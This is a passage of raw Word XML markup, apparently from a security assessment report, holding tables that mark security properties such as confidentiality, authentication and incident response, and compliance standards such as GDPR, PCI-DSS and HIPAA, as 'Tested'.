              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Assessment Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3BA7D4E6" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="37D01F66" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Confidentiality (protecting sensitive information)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4651654B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3AE0E6B4" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="309F4F8D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Integrity (ensuring data is accurate and unaltered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6ABB9F73" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0411CCCF" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="60FF5EC1" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Availability (ensuring systems are up and running)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FE30A60" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="711BACB6" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="39EAE310" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Authentication (verifying user identity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0315A9B1" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3AAF6B5F" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="4DBDB1E9" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Authorization (ensuring proper permissions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="015F28DE" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="2238C059" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="76B6E11E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Non-repudiation (preventing denial of actions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60E73DBF" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5BA9A852" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="7637E8C0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Data Encryption (securing data in transit and at rest)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59E90675" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="512E0E34" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="16AB2842" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Incident Detection and Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F3436FB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5C51D26A" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="6EE3C49E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Audit and Monitoring (tracking activity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32FAD889" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="04BE482F" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="4A0213C2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CBCDEDB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="66E3F9A6" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="12E3F7A3" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Disaster Recovery and Business Continuity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E9FE368" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="33918836" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52ED5295" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="758612F0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71233F61" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="X33940296c8390fe3aaffe366268adf13171a40c"/>
      <w:bookmarkStart w:id="34" w:name="_Toc178498967"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Engagement Legal and Compliance Considerations:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="46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16"/>
        <w:gridCol w:w="1514"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="65791C23" w14:textId="77777777" w:rsidTr="00E40E14">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shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="70435C2E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Compliance Standards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="633438EF" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Assessment Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="67179DEF" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="72395975" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>General Data Protection Regulation (GDPR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D29C92E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="4B225C93" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="1012CAD2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BFB8A78" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Payment Card Industry Data Security Standard (PCI-DSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3BFBEF91" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="4EFEA393" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="00465783" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Health Insurance Portability and Accountability Act (HIPAA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2597E37B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="70D83897" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="19D627FB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Sarbanes-Oxley Act (SOX)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="47C87909" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="1E6A9080" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="31FFEF65" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Federal Information Security Management Act (FISMA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="428FB6F4" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="4B2883B3" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="79363A84" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>International Organization for Standardization (ISO 27001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
